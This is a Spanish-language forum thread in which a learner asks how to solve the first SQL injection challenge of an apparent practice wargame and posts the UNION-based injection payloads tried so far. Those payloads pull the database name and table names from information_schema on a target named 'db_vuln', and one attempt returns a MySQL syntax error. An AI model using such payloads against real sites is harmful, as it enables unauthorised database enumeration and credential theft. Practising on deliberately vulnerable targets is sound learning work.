Hola a todos, tengo una duda que espero alguien me despeje, pero es la Senora duda, como hago el primer reto? no entiendo mucho(absolutamente nada) de sqli, ya que todo lo que encuentro es relacionado con la inyeccion Sql, ya que todo lo que encuentro esta relacionado con las direcciones, asi que mi pregunta es, alguien me recomiendo algun texto o lo que sea para saber donde empezar a tratar sobre este tema?
El cuaderno de SQL injection te será de ayuda!!
quiero pensar que el primer reto es el que vale 3 puntos encontrar el pasword del usuario adminboy a poner aki lo que e echo para que me orienten si boy bien o de plano estoy perdido'or'1'='1' UNION SELECT '1','2',concat(database())'-- (obtengo el nombre de la base de datos)ID: db_vulnNombre(s): 1Apellido(s) 2'or'1'='1' UNION SELECT '1','2',group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()-- -( Muestra nombre de tabla(“tb_usuarios,usuarios”))solo que estoy atorado aki ya qye estos comandos los ejecute el dia de ayer hoy lo e intentado con este ultimo y no a funcionado algo apunte mal y pues estoy buscando que es ya que me marca el errorYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''bueno espero sus comentarios
u.u por favor NO PUBLIQUEN SOLUCIONES Y SIGUE SIENDO EL MISMO peon83